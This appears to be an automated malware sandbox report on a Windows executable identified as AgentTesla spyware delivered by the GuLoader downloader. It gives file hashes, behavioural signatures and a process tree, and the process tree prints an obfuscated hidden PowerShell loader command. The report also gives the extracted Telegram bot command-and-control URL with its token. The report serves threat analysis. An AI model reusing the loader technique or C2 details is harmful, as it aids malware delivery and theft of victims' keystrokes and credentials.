Overview

overview

10

Static

static

3

attachments.zip

windows7-x64

1

attachments.zip

windows10-2004-x64

1

226350194-...64.rar

windows7-x64

10

226350194-...64.rar

windows10-2004-x64

7

226350194-...64.exe

windows7-x64

10

226350194-...64.exe

windows10-2004-x64

10

Civilhorto...ng.sko

windows7-x64

3

Civilhorto...ng.sko

windows10-2004-x64

3

Ejerkredse...31.don

windows7-x64

3

Ejerkredse...31.don

windows10-2004-x64

3

Ejerkredse...ng.ps1

windows7-x64

8

Ejerkredse...ng.ps1

windows10-2004-x64

8

Sudsers34/...se.ant

windows7-x64

3

Sudsers34/...se.ant

windows10-2004-x64

3

Sudsers34/...ns.oxo

windows7-x64

3

Sudsers34/...ns.oxo

windows10-2004-x64

3

Telekablet...st.txt

windows7-x64

1

Telekablet...st.txt

windows10-2004-x64

1

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/03/2024, 13:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    226350194-050944-sanlccjavap0003-11764.exe

  • Size

    626KB

  • MD5

    0d4bb5c57ce0f99b36056892cfe87f0c

  • SHA1

    bd884e9d666bce68ef23dfa139f6477f1c50f7ab

  • SHA256

    0301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c

  • SHA512

    7d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e

  • SSDEEP

    12288:RhKVcnRerrRiJJGDktgdRYCryyqmsufs5BKGR9YWYn+4t8w:REGnReZeJGDikBrLqmZgBKgPKnt/

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe
    "C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:608
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        3⤵
          PID:2492
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4224

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p14z3xtw.lo3.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Civilhortonoms\Dyretmmersken\Mealybug\Laesning.Sko
      Filesize

      348KB

      MD5

      edac2c2f62e371a80143df8caaec5b24

      SHA1

      0b7e4c090f25b6a0ffdab3e1d4e94ea3a706584b

      SHA256

      ae0652e2eedf1db5506d11bdf75d677c37fb7896c64435f6afdf9161235a9616

      SHA512

      aa37fc1656f385b4a18c2cd8edd4c6befec3b9df14fb656bbc831274c4e1708e292e0e60e26470f3159d2ab1819b39594cc854428b65028bc468c43d3d12e3be

      Download Submit

    • C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig
      Filesize

      57KB

      MD5

      f5a06265c76853290d3b7ed1c1d3e7b9

      SHA1

      4083441407a629edd297d1a480a4957740b99fd1

      SHA256

      f15289a9086ec32c0f072940209c5c50412dde5275dac49a8d271cb53e843eab

      SHA512

      52ef36d8443eec762f2980b0ada477a9b74f0af2d0cedfb73015fbac04c28e85a85af4be6a4f67c6d7ee3b59b07abf6be2042465154ac3525e035947db15d6e8

      Download Submit

    • memory/608-37-0x0000000004F90000-0x0000000004FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/608-41-0x0000000008FA0000-0x000000000B6FC000-memory.dmp

      Filesize

      39.4MB

      Download

    • memory/608-11-0x0000000005D60000-0x0000000005DC6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/608-12-0x0000000005E40000-0x0000000005EA6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/608-9-0x00000000055D0000-0x0000000005BF8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/608-22-0x0000000005EF0000-0x0000000006244000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/608-23-0x00000000064F0000-0x000000000650E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/608-24-0x0000000006520000-0x000000000656C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/608-25-0x0000000004F90000-0x0000000004FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/608-26-0x0000000006AD0000-0x0000000006B66000-memory.dmp

      Filesize

      600KB

      Download

    • memory/608-27-0x00000000069F0000-0x0000000006A0A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/608-28-0x0000000006A40000-0x0000000006A62000-memory.dmp

      Filesize

      136KB

      Download

    • memory/608-29-0x0000000007CF0000-0x0000000008294000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/608-7-0x0000000004F90000-0x0000000004FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/608-31-0x0000000008920000-0x0000000008F9A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/608-33-0x0000000004F90000-0x0000000004FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/608-8-0x0000000004E90000-0x0000000004EC6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/608-40-0x0000000004F90000-0x0000000004FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/608-36-0x0000000073F30000-0x00000000746E0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/608-6-0x0000000073F30000-0x00000000746E0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/608-10-0x0000000005C00000-0x0000000005C22000-memory.dmp

      Filesize

      136KB

      Download

    • memory/608-39-0x0000000004F90000-0x0000000004FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/608-35-0x0000000007A80000-0x0000000007A84000-memory.dmp

      Filesize

      16KB

      Download

    • memory/608-42-0x0000000004F90000-0x0000000004FA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/608-43-0x0000000008FA0000-0x000000000B6FC000-memory.dmp

      Filesize

      39.4MB

      Download

    • memory/608-44-0x0000000077981000-0x0000000077AA1000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/608-59-0x0000000008FA0000-0x000000000B6FC000-memory.dmp

      Filesize

      39.4MB

      Download

    • memory/608-46-0x0000000008FA0000-0x000000000B6FC000-memory.dmp

      Filesize

      39.4MB

      Download

    • memory/608-56-0x0000000073F30000-0x00000000746E0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4224-62-0x00000000229F0000-0x0000000022A40000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4224-67-0x0000000073F30000-0x00000000746E0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4224-51-0x0000000002260000-0x00000000049BC000-memory.dmp

      Filesize

      39.4MB

      Download

    • memory/4224-55-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4224-57-0x0000000073F30000-0x00000000746E0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4224-48-0x0000000077981000-0x0000000077AA1000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/4224-60-0x0000000020570000-0x0000000020580000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4224-45-0x0000000002260000-0x00000000049BC000-memory.dmp

      Filesize

      39.4MB

      Download

    • memory/4224-49-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4224-58-0x0000000001000000-0x0000000001040000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4224-63-0x0000000022AE0000-0x0000000022B72000-memory.dmp

      Filesize

      584KB

      Download

    • memory/4224-64-0x0000000022A50000-0x0000000022A5A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4224-47-0x0000000077A08000-0x0000000077A09000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4224-68-0x0000000020570000-0x0000000020580000-memory.dmp

      Filesize

      64KB

      Download